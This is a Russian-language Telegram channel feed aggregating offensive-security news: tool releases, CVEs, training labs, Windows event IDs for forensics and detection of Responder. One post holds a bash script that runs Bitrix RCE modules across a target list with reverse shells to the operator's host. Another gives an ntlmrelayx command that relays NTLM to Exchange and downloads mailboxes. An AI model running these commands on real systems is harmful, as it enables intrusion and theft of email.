Pentester's Backlog
590 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Волосатый бублик
#rdp #client

[ EVILRDP ]

Rdp client with:
- Control mouse and keyboard in an automated way from command line
- Control clipboard in an automated way from command line
- Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
- Execute arbitrary SHELL and PowerShell commands on the target without uploading files
- Upload and download files to/from the target even when file transfers are disabled on the target

https://github.com/skelsec/evilrdp
👍 Сейчас на образовательной платформе TryHackMe Проходит ежегодный Advent of Cyber (2023) - своего рода "спринт" по темам из мира Red / Blue team и ИБ в целом.

Задумка прекрасная, можно узнать много нового, а также освежить память знакомым материалом.
К слову, также можно поучаствовать в раздаче всякого SWAG'а и девайсов (с доставкой в Россию, думаю, будут проблемы, но всё же).
Последний год TryHackMe развивает площадку в сторону создания материала по Defense-направлению, поэтому полагаю, что будет много заданий именно на эту тематику.

Помимо этого, предлагаю ознакомиться с материалами прошлых лет:
Advent of Cyber 2022
Advent of Cyber 2021
Advent of Cyber 2020

😶 Учитесь новому - это весело!
Please open Telegram to view this post
VIEW IN TELEGRAM
1🎃1🎄1💊1
Forwarded from Волосатый бублик
#web #portswigger #burp #api

New topic on Web Security Academy — API testing

By guiding you step-by-step through the process of testing APIs, we will teach you to spot, understand, and then exploit them to their full potential.

Ready to get stuck in?


https://portswigger.net/web-security/api-testing

5 new labs are also here for you:

Exploiting an API endpoint using documentation

Exploiting server-side parameter pollution in a query string

Finding and exploiting an unused API endpoint

Exploiting a mass assignment vulnerability

Exploiting server-side parameter pollution in a REST URL
Forwarded from Blue (h/c)at Café (nataly)
🧃 Немного сока — Основные ID Событий в Журнале Windows

При проведении расследований на компьютерах Windows, ключевым аспектом является анализ журналов событий. Эти журналы предоставляют обширные данные, которые могут помочь выявить необычные или подозрительные действия.
Расположение журнала:
C:\Windows\System32\winevt\Logs 

Вот чек лист основных ID событий, на которые следует обратить внимание:

✖️ Служба Windows BITS(хождение по http):

3: Создание нового BITS задания.
4: BITS задание выполнено.
5: BITS задание завершено.
59: BITS начала выполнение задания.
60: BITS остановила выполнение задания.

✖️ События локальных сессий(по журналу Local Session Manager):

21: Успешный вход в систему.
22: Получено уведомление о запуске оболочки.
23: Успешный выход из сеанса.
24: Сеанс был отключен.
25: Успешное переподключение сеанса.

✖️ Операции с задачами(журнал событий отложенных задач Task Scheduler):

100: Начало выполнения задачи.
102: Задача завершена.
106: Задача зарегистрирована.

📌

Журнал по умолчанию выключен.


✖️ События операций RDP(по журналу Remote Connection Manager):

1149: Успешная проверка подлинности пользователя.
1102: Начало много-транспортного соединения с сервером.
1024-1026: События подключения и отключения RDP.

✖️ События безопасности

4624: Успешный вход учетной записи.
4625: Ошибка входа учетной записи.
4634-4722: События учетных записей и их изменения.

✖️ Анализ операций Windows Defender

5007: Изменение конфигурации Windows Defender.
1116: Обнаружение вредоносного ПО.
1117: Действия по защите компьютера.

✖️ Активность в WMI(журнал WMI-Activity):

5861: Подписка на события.
5860: WMI запрос.
5857: Запуск провайдера.

✖️ События работы со службами

7030: Ошибка создания службы.
7045: Служба создана.

✖️ Операции в PowerShell

600: Стартовал поставщик "Variable".
4103-4104: Выполнение модулей и создание скриптов. (Необходимо включить данное логирование)


#purpleteam #soc
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Sergey Zybnev)
Вышла Kali Linux 2023.4 с 15 новыми инструментами

Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.

Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:

cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.

📌 Я лично заинтересован в enum4linux-ng, h8mail, Havoc и Portspoof.

Если вы тоже не знаете, что такое TAXII, вы не одни такие :D. Вот что это:
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel.
😉

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Atlassian молодцы, на 9 из 10 (в смысле, по критичности уязвимостей)

CVE-2023-22522: Template injection flaw allowing authenticated users, including those with anonymous access, to inject unsafe input into a Confluence page (critical, with a 9.0 severity score). The flaw impacts all Confluence Data Center and Server versions after 4.0.0 and up to 8.5.3.
CVE-2023-22523: Privileged RCE in Assets Discovery agent impacting Jira Service Management Cloud, Server, and Data Center (critical, with a 9.8 severity score). Vulnerable Asset Discovery versions are anything below 3.2.0 for Cloud and 6.2.0 for Data Center and Server.
CVE-2023-22524: Bypass of blocklist and macOS Gatekeeper on the companion app for Confluence Server and Data Center for macOS, impacting all versions of the app prior to 2.0.0 (critical, with a 9.6 severity score).
CVE-2022-1471:  RCE in SnakeYAML library impacting multiple versions of Jira, Bitbucket, and Confluence products (critical, with a 9.8 severity score).
Forwarded from s0i37_channel
Responder является мощным атакующим инструментом, must-have для любого внутрянщика. Отвечая ложными ответами на широковещательные разрешения имён (например через NetBIOS) хакер может заставить вашу рабочую станцию подключиться куда угодно, и даже к нему самому. В итоге это приводит к ошибочным подключениям, с как правило автоматической сквозной аутентификацией. В свою очередь это разглашает учетные данные, которые могут быть подвергнуты bruteforce атаке, либо для обхода аутентификации с помощью NTLM-relay атак. Иногда с помощью responder удаётся даже проксировать веб трафик жертвы.
Так много атак... Но можно ли как то обнаружить responder?
Forwarded from s0i37_channel
Обнаружить responder проще простого. Достаточно лишь сгенерировать случайное короткое имя и спросить про него широковещательно. Если упрощённо, то - ping blablabla, если ответ есть - значит злоумышленник рядом с вами.
Forwarded from s0i37_channel
Скрипт https://github.com/s0i37/defence/blob/main/netbios.py делает эту проверку более точно. Он периодически шлёт в сеть широковещательно NetBIOS-запросы со случайными именами. И как только начинают поступать ответы - это сигнал что рядом с вами кто то запустил responder.
Защититься от атак responder это одно, но выявлять такие атаки - значит заметить внутреннего нарушителя на ранней стадии.
😴1
🫀 Один из самых простых и занятных "низко висящих фруктов" (наряду с данной вулной), встречающихся на проектах - CVE-2022-1026.

⚠️ Суть данной уязвимости заключается в том, что неаутентифицированный злоумышленник может обратиться на SOAP интерфейс устройства Kyocera с запросом адресной книги принтера. И устройство, в свою очередь, спокойно её отдаст (в формате XML), в ней могут храниться учетные записи (в том числе доменные), а также названия сетевых папок, когда-либо взаимодействовавших с данным устройством.

Remedations?
Дергайте принтер из розетки Отключайте SOAP-интерфейс (обычно, порт 9091)!

💻 POC для данной уязвимости

🔍 Подробнее о CVE-2022-1026
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💅2🔥1
Forwarded from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec

Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др

https://www.netexec.wiki

Ставиться проще простого через pipx

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec


Запускается тоже просто

NetExec
nxc
nxcdb
netexec

nxcdb


Для простоты восприятия можете добавить ~/.zshrc

alias cme=netexec
alias crackmapexec=netexec
Forwarded from Похек (Sergey Zybnev)
quick-tricks
9 MB
🔥 quick-trics_auto.sh

Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.

#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done


🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.

Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1💔1
Forwarded from Похек (Sergey Zybnev)
NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Proxy Bar
CVE-2023-6553 Exploit
Плагин Backup Migration для WordPress , RCE до версии 1.3.7 включительно
*
exploit


#wordpress #rce
MireaCTF finals
Пока так 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🥴1
Pentester's Backlog
MireaCTF finals Пока так 👍
По итогу финалов занимаем почётное 3-е место в официальном зачёте (на скрине общий).

Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте 🐈), и вся эта ред/блю тимерская суета принесла много положительных эмоций

kurilka ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
😳 Большое спасибо за первую сотню.

Дальше - больше, лучше, качественнее, информативней и оперативнее!

☠️ Открыл комментарии к постам!
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3🔥1
Forwarded from true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket):
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox